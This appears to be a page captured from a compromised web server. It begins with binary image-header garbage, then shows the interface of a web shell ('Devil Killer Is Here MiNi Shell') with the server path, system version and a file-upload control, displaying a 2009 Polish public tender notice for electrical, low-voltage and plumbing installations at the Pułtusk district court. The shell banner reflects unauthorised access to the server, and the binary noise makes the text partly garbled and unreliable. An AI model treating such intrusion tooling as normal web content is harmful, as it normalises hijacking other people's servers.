JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090206/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090206/20488-N-2009.html

<p class="kh_header"><b>Ostrołęka: ROBOTY BUDOWLANE POLEGAJĄCE NA WYKONANIU INSTALACJI WEWNĘTRZNYCH: NISKOPRĄDOWEJ, WOD. - KAN. I ELEKTRYCZNEJ W BUDYNKU C SĄDU REJONOWEGO W PUŁTUSKU.</b><br>
<b>Numer ogłoszenia: 20488 - 2009; data zamieszczenia: 06.02.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Sąd Okręgowy w Ostrołęce I Wydział Cywilny , ul. Gomulickiego 5, 07-410 Ostrołęka, woj. mazowieckie, tel. 029 7650137, 7650134, faks 029 7650187.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Organ kontroli państwowej lub ochrony prawa, sąd lub trybunał.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> ROBOTY BUDOWLANE POLEGAJĄCE NA WYKONANIU INSTALACJI WEWNĘTRZNYCH: NISKOPRĄDOWEJ, WOD. - KAN. I ELEKTRYCZNEJ W BUDYNKU C SĄDU REJONOWEGO W PUŁTUSKU..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Część B - Opis Przedmiotu Zamówienia


I.	OPIS
1.	Opis przedmiotu zamówienia sporządzono poprzez dołączenie przedmiaru robót, specyfikacji technicznej wykonania i odbioru robót, projektów wykonawczych:
1)	instalacji wewnętrznej elektrycznej;
2)	instalacji wewnętrznych niskoprądowych:
a)	systemu sygnalizacji włamania;
b)	systemu sygnalizacji pożaru;
c)	instalacji okablowania strukturalnego;
3)	instalacji wewnętrznej wodno - kanalizacyjnej,
stanowiących podstawę do sporządzenia kosztorysu ofertowego.
2.	Rodzaj zamówienia: roboty budowlane
3.	Określenie przedmiotu oraz wielkości lub zakresu zamówienia: Przedmiotem zamówienia są roboty budowlane - wykonanie instalacji wewnętrznych: elektrycznej, niskoprądowej i wodno - kanalizacyjnej w adaptowanym dla potrzeb Sądu Rejonowy w Pułtusku budynku C.
Zakres rzeczowy obejmuje:
1)	wewnętrzna instalacja elektryczna:
a)	instalacja zasilająca z istniejącej rozdzielnicy RG zlokalizowanej 
w budynku B do projektowanej tablicy głównej TG2 - roboty ziemne, ułożenie rur osłonowych, ułożenie kabli. Wewnętrzne linie zasilające 
z przewodów YDY5x6 prowadzone pod tynkiem;
b)	instalacja oświetlenia ogólnego - oświetlenie z wykorzystaniem żarowych i fluorescencyjnych źródeł światła;
c)	instalacja gniazd wtykowych - gniazda wtykowe ogólnego stosowania dla zasilania drobnego sprzętu oświetleniowego, elektromechanicznego, czajników elektrycznych oraz ogrzewaczy pojemnościowych wody oraz gniazda wtykowe dla zasilania sprzętu komputerowego;
d)	instalacja odgromowa - w postaci zwodów poziomych połączonych 
z uziomem instalacji odgromowej zwodami pionowymi. Uziom instalacji odgromowej budynku połączyć z uziomem instalacji odgromowej całego obiektu;
e)	instalacja połączeń ekwipotencjalnych;
f)	instalacja ochrony przeciwprzepięciowej;
g)	instalacja ochrony od porażeń prądem eklektycznym,
W całym budynku instalację należy wykonać pod tynkiem oraz należy instalować osprzęt bakelitowy n/t - w/t.
2)	wewnętrzna instalacja niskoprądowa:
a)	instalacja systemu sygnalizacji włamania - rozszerzenie linii alarmowych z zasilaczami buforowymi dedykowanymi do systemu sygnalizacji włamania i napadu. Połączenie rozszerzeń w budynku C z centralą alarmową zlokalizowaną w serwerowni sadu w piwnicy budynku B za pośrednictwem przewodu magistralnego;
b)	instalacja systemu sygnalizacji pożaru - pętle p. poż z budynku C doprowadzić do istniejącego budynku B i połączyć z wcześniej rozciętą pętlą sygnalizatorów. Analogowy adresowalny system p. poż wraz z czujkami wielosensorowymi, ręcznymi przyciskami ostrzegawczymi, sygnalizatorami akustycznymi;
c)	instalacja okablowania strukturalnego - przewody UTP z budynku C doprowadzić do pośredniego punktu dystrybucyjnego PPD 
w istniejącym budynku B.
3)	wewnętrzna instalacja wodno - kanalizacyjna
a)	wewnętrzna instalacja wodociągowa - zakłada się wykorzystanie istniejących rur rozprowadzających, natomiast wszystkie podejścia należy wykonać od nowa. Do pozyskania ciepłej wody przewidziano elektryczne, pojemnościowe podgrzewacze wody. Wykonanie wewnętrznej instalacji wody zimnej i ciepłej z rur i złączek w systemie fusiotherm z polipropylenu. Istniejące piony wodociągowe prowadzić w szachtach montażowych obudowanych płytami gipsowo 
- kartonowymi.
b)	wewnętrzna instalacja kanalizacji sanitarnej - odbiornikiem ścieków sanitarnych z budynku C jest istniejąca miejska sieć kanalizacji sanitarnej. W budynku C istniejąca kanalizacja sanitarna zachowuje istniejące poziome rury, natomiast następuje wymiana pionów oraz wykonanie nowych podejść pod przybory sanitarne. Całą instalację wykonać z rur i kształtek z PCV w systemie rur kielichowych kanalizacji wewnętrznej. Łączenie rur na wcisk. Każdy pion wyposażony w czyszczak i zakończony rurą wywiewną z PCV wyprowadzoną ponad dach. Przy przejściach wszystkich pionów kanalizacyjnych przez stropy stosować przepusty ogniochronne.
4.	Prace towarzyszące i roboty tymczasowe
takie jak:
1)	transport, składowanie materiałów;
2)	zorganizowanie zaplecza wykonywanych robót;
3)	udział w czynnościach poprzedzających odbiór robót;
4)	zapewnienie stosownych dokumentów na wyroby budowlane;
5)	wykonanie dokumentacji projektowej powykonawczej geodezyjnej 
i poszczególnych branż - elektrycznej i sanitarnej;
6)	ochrona materiałów i elementów wyposażenia użytych do realizacji robót od chwili rozpoczęcia do ostatecznego odbioru robót;
7)	pozostałe prace towarzyszące i tymczasowe związane z realizacją przedmiotu zamówienia
nie stanowią odrębnych pozycji kosztorysowych i powinny być przez wykonawcę uwzględnione w kosztach robót podstawowych.
5.	Przy sporządzaniu wyceny w oparciu o projekty wykonawcze i przedmiary robót, wykonawca jest zobowiązany do przestrzegania danych podanych 
w specyfikacji technicznej wykonania i odbioru robót. Ma obowiązek wyceny wszystkich prac z zachowaniem procesów technologicznych objętych opisem przedmiotu zamówienia, projektami wykonawczymi, przedmiarami robót 
i specyfikacjami technicznymi wykonania i odbioru robót.
6.	Wykonawca  zobowiązany jest do przeprowadzenia wizji lokalnej w celu uwzględnienia całości robót oraz samodzielnej weryfikacji załączonych projektów wykonawczych, przedmiarów robót oraz prac wynikających z opisu przedmiotu zamówienia. Wykonawca upewni się na miejscu, że zachowanie wszystkich danych o realizacji zamówienia jest możliwe. Wykonawca zobowiązany jest uwzględnić w ramach zagregowanych pozycji przedmiarowych zawartych w załączonym przedmiarze robót.
7.	Kosztorysy ofertowe należy sporządzić w oparciu o przedmiary robót 
z podziałem na poszczególne przedmiary wyszczególnione w zestawieniu przedmiarów robót stanowiącym załącznik nr 1 do niniejszego opisu przedmiotu zamówienia.
8.	Wykonawca sporządzając kosztorys ofertowy w treści tego kosztorysu przy wycenie pozycji przedmiarowych poda typ, producenta materiału, urządzenia, jakiego zamierza użyć przy wykonywaniu zamówienia.
9.	Wykonawca przed złożeniem oferty dokładnie sprawdzi zgodność wszystkich danych i wymiarów związanych z opisem przedmiotu zamówienia, projektami wykonawczymi i przedmiarami robót stanowiącymi element dokumentacji projektowej i upewni się, że nie ma rozbieżności między stanem faktycznym a dostarczonymi do wyceny danymi i opracowaniami.
10.	Wszelkie korekty przedmiarów dotyczące braku zgodności ze stanem faktycznym mogą być zgłoszone przez wykonawcę na etapie zapytań do specyfikacji istotnych warunków zamówienia.
11.	Złożenie oferty stanowi akceptację zakresu przedmiotu zamówienia a tym samym przedmiarów robót.
12.	Wszystkie proponowane materiały muszą być oferowane w I gatunku, fabrycznie nowe, nieużywane a roboty wykonane w powszechnie przyjętym standardzie.
13.	Użyte do wykonania przedmiotu zamówienia materiały i wyroby muszą posiadać atesty, certyfikaty, deklaracje zgodności w zakresie wymaganymi odrębnymi przepisami szczególnymi, w tym ustawy Prawo Budowlane, 
tj. ogólnie - dokumentu zezwalającego na wprowadzenie do obrotu 
i stosowania w budownictwie.
14.	Ujęte w projektach wykonawczych nazwy handlowe i znaki towarowe zastosowanych urządzeń, aparatury i innych materiałów należy traktować jako rozwiązanie przykładowe określające parametry i standard jakościowy. Dopuszcza się zastosowanie urządzeń, aparatury i materiałów innych producentów pod warunkiem, że posiadają one dopuszczenie do stosowania zgodnie z wymogami ustawy Prawo budowlane, ustawy o wyrobach budowlanych oraz posiadają parametry techniczne nie gorsze niż określone 
w projektach wykonawczych.
15.	Wspólny Słownik Zamówień (CPV): 45310000-3, 45314310-7, 45312200-9, 45312100-8, 45330000-9
16.	Czas trwania zamówienia lub termin wykonania: Wprowadzenie na budowę w ciągu siedmiu dni od dnia podpisania umowy. Rozpoczęcie robót
w ciągu siedmiu od dnia wprowadzenia na budowę. Zakończenie robót: do 30.04.2009 r.
Powyższy zakres robót będzie wykonywany w obiekcie, w którym głównym wykonawcą robót adaptacyjnych (wykonanie instalacji centralnego ogrzewania oraz roboty ogólnobudowlane - wewnętrzne roboty rozbiórkowe, wykonanie ścian i okładzin ściennych, malowanie, wykonanie posadzek, wymiana stolarki okiennej i drzwiowej, renowacja stropodachu, wykonanie elewacji) jest Przedsiębiorstwo Produkcyjno - Usługowego ZAMBET S.A., 06-100 Pułtusk, ul. Aleja Wojska Polskiego 52A. W związku z powyższym wykonywanie robót związanych z realizację zamówienia Wykonawca winien prowadzić 
w uzgodnieniu i za wiedzą głównego wykonawcy robót adaptacyjnych dostosowując zakres i czasokres poszczególnych prac do harmonogramu rzeczowego głównego wykonawcy.
17.	Wykonawca w terminie czternastu dni od daty podpisania umowy przedłoży Zamawiającemu harmonogram rzeczowo - finansowy robót uzgodniony 
i zaakceptowany przez głównego wykonawcę robót adaptacyjnych.
18.	Nadzór inwestorski prowadzony będzie przez Zamawiającego.

III.	INFORMACJE O TERENIE BUDOWY
1.	Organizacja robót
1)	przy robotach remontowych należy stosować się do unormowań zawartych w ustawie Prawo budowlane;
2)	czynności stanowiące przedmiot zamówienia wykonawca podejmie po komisyjnym wprowadzeniu na budowę udokumentowanym protokółem podpisanym przez upoważnione osoby reprezentujące Wykonawcę 
i Zamawiającego (Inwestora);
3)	Wykonawca zobowiązany jest poprzez sposób prowadzenia robót zachować termin wykonania zamówienia.
2.	Zabezpieczenie interesów osób trzecich
1)	właścicielem terenu, na którym znajduje się budynek jest Skarb Państwa natomiast Sąd Rejony w Pułtusku omawiany teren posiada w trwałym zarządzie;
2)	ocenia się, że interesy osób trzecich po przeprowadzeniu robót budowlanych zgodnych z przedmiotem zamówienia będą chronione 
w należyty sposób stosownie do postanowień ustawy Prawo budowlane;
3)	obiekt budynek C jest w pełni neutralny dla środowiska naturalnego 
i obiektów zlokalizowanych w bezpośrednim sąsiedztwie.
3.	Ochrona środowiska i zdrowia ludzi
1)	osoby trzecie oraz osoby wykonujące roboty budowlane nie mogą być narażone na działanie czynników szkodliwych dla zdrowia lub niebezpiecznych, a w szczególności takich jak hałas, wibracje, promieniowanie elektromagnetyczne, pyły i gazy o natężeniach 
i stężeniach przekraczających wartości dopuszczalne.
2)	zamówienie będące przedmiotem niniejszego opracowania nie zalicza się do robót budowlanych mogących oddziaływać na środowisko 
w rozumieniu przepisów dotyczących ochrony środowiska;
3)	w trakcie prac budowlanych Wykonawca jest obowiązany uwzględnić ochronę środowiska na obszarze prac. Zastosuje rozwiązania ograniczające poziom hałasu do wartości dopuszczalnych;
4.	Warunki bezpieczeństwa pracy
1)	przy wykonywaniu robót Wykonawca zobowiązany jest do przestrzegania ogólnych przepisów w zakresie bezpieczeństwa i higieny pracy;
2)	kwalifikacje personelu Wykonawcy robót powinny być stwierdzone przez właściwą komisję egzaminacyjną i udokumentowane aktualnie ważnymi zaświadczeniami kwalifikacyjnymi;
3)	przed przystąpieniem do robót szczególnie niebezpiecznych należy:
a)	sprawdzić tożsamość i zaświadczenia kwalifikacyjne osób;
b)	wskazać brygadzie wykonawczej miejsce pracy;
c)	sprawdzić razem z kierownikiem robót czy w miejscu pracy zostały zachowane właściwe zabezpieczenia i inne warunki BHP.
5.	Warunki dotyczące organizacji ruchu
Remont realizowany będzie wewnątrz budynku usytuowanego na terenie wewnętrznym Sądu Rejonowego w Pułtusku.
Teren ma bezpośredni dostęp do drogi publicznej tj: ul. Szkolna.
6.	Ogrodzenie
Teren nie wymaga wykonywania ogrodzenia.
7.	Zabezpieczenie chodników i jezdni
		Roboty budowlane nie mają wpływu na chodniki i jezdnie.


VI.WYMAGANIA, DZIAŁANIA KONTROLNE, ODBIÓR ROBÓT, OPIS SPOSOBU ROZLICZENIA
1.	Wykonawca robót zobowiązany jest do:
1)	zabezpieczenia obsługi geodezyjnej w trakcie realizacji robót oraz sporządzenia inwentaryzacji geodezyjnej powykonawczej przez uprawnionych geodetów - koszt należy uwzględnić w ofercie;
2)	zabezpieczenia wszystkich niezbędnych urządzeń i materiałów 
do wykonania zamówienia;
3)	prowadzenia robót budowlanych objętych zamówieniem zgodnie 
z przepisami, w tym techniczno - budowlanymi, obowiązującymi Polskimi Normami oraz zasadami wiedzy technicznej. Co najmniej dwóch pracowników musi posiadać uprawnienia do obsługi i eksploatacji urządzeń i instalacji do 1kV wydane przez właściwe instytucje;
4)	prowadzenia dziennika budowy;
5)	stosowania do wykonania zamówienia materiałów i urządzeń posiadających odpowiednie atesty, certyfikaty, deklaracje zgodności;
6)	wykonywania prac w budynku w uzgodnieniu i za wiedzą generalnego wykonawcy rozbudowy i modernizacja budynku Sądu Rejonowego 
w Pułtusku - tj., Przedsiębiorstwa Produkcyjno - Usługowego ZAMBET S.A., 06-100 Pułtusk, ul. Aleja Wojska Polskiego 52A;
7)	powiadomienia użytkownika obiektu tj. Sąd Rejonowy w Pułtusku 
o terminie i zakresie prac wykraczających poza bryłę budynku C tj. roboty na zewnątrz budynku i prace dostosowawcze w budynku B;
8)	wykonania trwałego oznakowania i zabezpieczenia prowadzonych robót na czas budowy z zachowaniem obowiązujących przepisów BHP i PPOŻ;
9)	do uzgodnienia wszelkich zmian dotyczących zastosowanych materiałów 
i urządzeń, każda zmiana musi być uzgadniana z Zamawiającym 
i projektantem;
10)	  niezależnie od rękojmi ustawowej Wykonawca udzieli gwarancji jakości na wykonane roboty w branżach:
a)	elektrycznej		- na okres 60 miesięcy;
b)	sanitarnej		- na okres 60 miesięcy;
c)	urządzenia		- zgodnie z gwarancjami producentów.
Termin gwarancji liczony będzie od dnia dokonania odbioru końcowego przedmiotu umowy.
Wykonawca wystawi w dniu odbioru końcowego przedmiotu umowy kartę gwarancyjną.
2.	Podwykonawcy
	Zamawiający nie dopuszcza realizacji zamówienia przez podwykonawców na roboty elektryczne - instalacje wewnętrzne elektryczne, instalacje wewnętrzne niskoprądowe.
3.	Wymagania dotyczące właściwości wyrobów budowlanych
1)	wyroby budowlane muszą być zgodne z postanowieniami ustawy 
o wyrobach budowlanych;
2)	materiały używane do realizacji zamówienia muszą odpowiadać postanowieniom zawartym w dokumentach kontraktowych (umowa, SIWZ, wymogi technologiczne);
3)	Wykonawca powinien zagwarantować, że urządzenia, materiały dostarczone w ramach realizacji zamówienia będą fabrycznie nowe, nieużywane i posiadać będą wymagane prawem atesty, deklaracje zgodności i certyfikaty.
4.	Wymagania dotyczące sprzętu i maszyn niezbędnych lub zalecanych do wykonania robót budowlanych
1)	maszyny, urządzenia i sprzęt zmechanizowany używane na budowie powinny być ustawione i użytkowane zgodnie z wymaganiami producenta i ich przeznaczeniem;
2)	maszyny i inne urządzenia techniczne powinny być:
a)	utrzymywane w stanie zapewniającym ich sprawność;
b)	stosowane wyłącznie do prac do jakich zostały przeznaczone;
c)	obsługiwane przez uprawnione osoby.
3)	eksploatowane na budowie urządzenia i sprzęt zmechanizowany podlegające przepisom o dozorze technicznym powinny posiadać ważne dokumenty uprawniające do ich eksploatacji. Dokumenty te powinny być dostępne dla organów kontroli w miejscu eksploatacji maszyn i urządzeń.
5.	Wymagania dotyczące środków transportu
1)	środki i urządzenia transportowe powinny być odpowiednio przystosowane do transportu materiałów itp. niezbędnych do wykonywania danego rodzaju robót;
2)	muszą one zapewniać prowadzenie robót zgodnie z zasadami określonymi w dokumentacji projektowej i niniejszym opracowaniu oraz wskazaniami zamawiającego wynikającymi z harmonogramu robót;
3)	przy ruchu po drogach publicznych pojazdy muszą spełniać wymagania dotyczące przepisów ruchu drogowego, szczególnie w odniesieniu do dopuszczalnych obciążeń na osie i innych parametrów technicznych. Środki transportu nie odpowiadające przedstawionym warunkom, będą usunięte z terenu budowy na polecenie Zamawiającego;
4)	Wykonawca jest zobowiązany usuwać na bieżąco, na własny koszt, wszelkie uszkodzenia i zanieczyszczenia spowodowane przez jego pojazdy na drogach publicznych oraz dojazdach do terenu realizacji niniejszego zamówienia.
6.	Opis działań związanych z kontrolą, badaniami oraz odbiorem robót budowlanych
1)	Zamawiający będzie miał nieograniczony dostęp do remontowanych pomieszczeń w celu przeprowadzenia ich inspekcji;
2)	z odbioru końcowego sporządzony zostanie protokół podpisany przez członków komisji, w składzie której znajdą się przedstawiciele Wykonawcy, Zamawiającego, inspektorów nadzoru i użytkownika obiektu;
7.	Opis sposobu rozliczenia
1)	Wykonawca będzie wystawiał faktury VAT za wykonane części robót wynikające z harmonogramu rzeczowo - finansowego. Wartość ostatniej faktury nie może być niższa niż 35 % ceny oferty. Termin zapłaty faktury 30 dni od doręczenia Zamawiającemu. Zapłata ostatniej faktury będzie uwarunkowana bezusterkowym protokołem odbioru końcowego.
2)	Roboty tymczasowe i prace towarzyszące
Uznaje się, że wszelkie koszty związane z wykonaniem prac tymczasowych i towarzyszących nie podlegają odrębnej zapłacie i będą uwzględnione przez Wykonawcę w cenach jednostkowych robót podstawowych.

VII.ZAŁĄCZNIKI DO OPISU PRZEDMIOTU ZAMÓWIENIA
1.	Załącznik nr 1 	- Zestawienie przedmiarów robót;
2.	Załącznik nr 2 	- Projekty wykonawcze;
3.	Załącznik nr 3 	- Specyfikacje techniczne wykonania i odbioru robót

na płycie CD - R lub do wglądu w siedzibie Zamawiającego oraz na stronie internetowej Zamawiającego ostroleka.so.gov.pl.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.31.00.00-3, 45.31.43.10-7, 45.31.22.00-9, 45.31.21.00-8, 45.33.00.00-9.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.04.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Wykonawca jest zobowiązany do wniesienia wadium w wysokości: 4 000 zł<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy:
- spełniają warunki udziału w  postępowaniu określone w art. 22 ust. 1 pkt 1 - 3 ustawy - Prawo zamówień publicznych, oraz nie podlegają wykluczeniu z postępowania o udzielenie zamówienia      na podstawie art. 24 ust. 1 i 2 ustawy - Prawo zamówień publicznych
- udokumentują, że wykonali co najmniej jedną robotę budowlaną w okresie ostatnich trzech lat, licząc od terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, obejmującą roboty: instalacji wewnętrznej elektrycznej lub instalacji wewnętrznej niskoprądowej lub instalacji wewnętrznej wodno-kanalizacyjnej, o wartości  min. 100 000 zł brutto                                          z podaniem jej wartości, przedmiotu, dat wykonania i odbiorców oraz załączenia dokumentów potwierdzających, że robota budowlana została wykonana należycie. Dokumenty te powinny być wystawione przez Zamawiającego.
- udokumentują, że Wykonawca dysponuje podstawowym personelem kierowniczym (kierownicy robót) i technicznym, który będzie uczestniczył w realizacji robót wraz z informacją o jego kwalifikacjach i doświadczeniu. Do informacji załączyć kserokopie:
- uprawnień budowlanych do kierowania robotami budowlanymi bez ograniczeń w specjalności:
-	instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych;
-	instalacyjnej w zakresie sieci, instalacji i urządzeń teletechnicznych;
-	instalacyjnej w zakresie sieci, instalacji i urządzeń wodociągowych i kanalizacyjnych.
- obsługi i eksploatacji urządzeń i instalacji do 1kV - min. 2 osoby
- aktualnych zaświadczeń potwierdzających przynależność do Polskiej Izby Inżynierów Budownictwa;
lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonywania zamówienia;
- są ubezpieczeni od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej (na kwotę min. 200 000 zł);
2. Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana wg formuły spełnia - nie spełnia w oparciu o informacje zawarte w oświadczeniach i dokumentach, jakie mają dostarczyć Wykonawcy w celu potwierdzenia spełnienia warunków udziału w  postępowaniu, wyszczególnionych w SIWZ..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1. Oferta musi zawierać następujące oświadczenia i dokumenty: 
a)  oferta (załącznik nr 1 do SIWZ),
b)  kosztorys - sporządzony w oparciu o przedmiary robót z podziałem na poszczególne przedmiary wyszczególnione w zestawieniu przedmiarów robót stanowiących załącznik nr 1 do Opisu Przedmiotu Zamówienia (część B), w treści tego kosztorysu przy wycenie pozycji przedmiarowych należy  podać typ, producenta materiału, urządzenia, jakiego zamierza użyć przy wykonywaniu zamówienia.
c)  oświadczenie Wykonawcy o spełnianiu warunków udziału w postępowaniu określonych w  art. 22 ust. 1 pkt1-3 oraz że nie podlega wykluczeniu z ubiegania się o udzielenie zamówienia  w myśl art. 24 ust. 1 i 2 ustawy - Prawo zamówień publicznych (załączniki nr 2 do SIWZ),
d) aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert, 
e)  podpisany wzór umowy (załącznik nr 5 do SIWZ),
f)  pełnomocnictwo - w przypadku podmiotów wspólnie ubiegających się o udzielenie zamówienia publicznego,
g) wykaz wykonanej co najmniej jednej roboty budowlanej w okresie ostatnich trzech lat, licząc od terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, obejmującą roboty: instalacji wewnętrznej elektrycznej lub instalacji wewnętrznej niskoprądowej lub instalacji wewnętrznej wodno-kanalizacyjnej, o wartości  min. 100 000 zł brutto                                    z podaniem jej wartości, przedmiotu, dat wykonania i odbiorców oraz załączenia dokumentów potwierdzających, że robota budowlana została wykonana należycie. Dokumenty te powinny być wystawione przez Zamawiającego - (załącznik nr 3 do SIWZ),
h)  wykaz podstawowego personelu kierowniczego (kierownicy robót) 
i technicznego, który będzie uczestniczył w realizacji robót wraz z informacją o jego kwalifikacjach i doświadczeniu. Do informacji załączyć kserokopie:
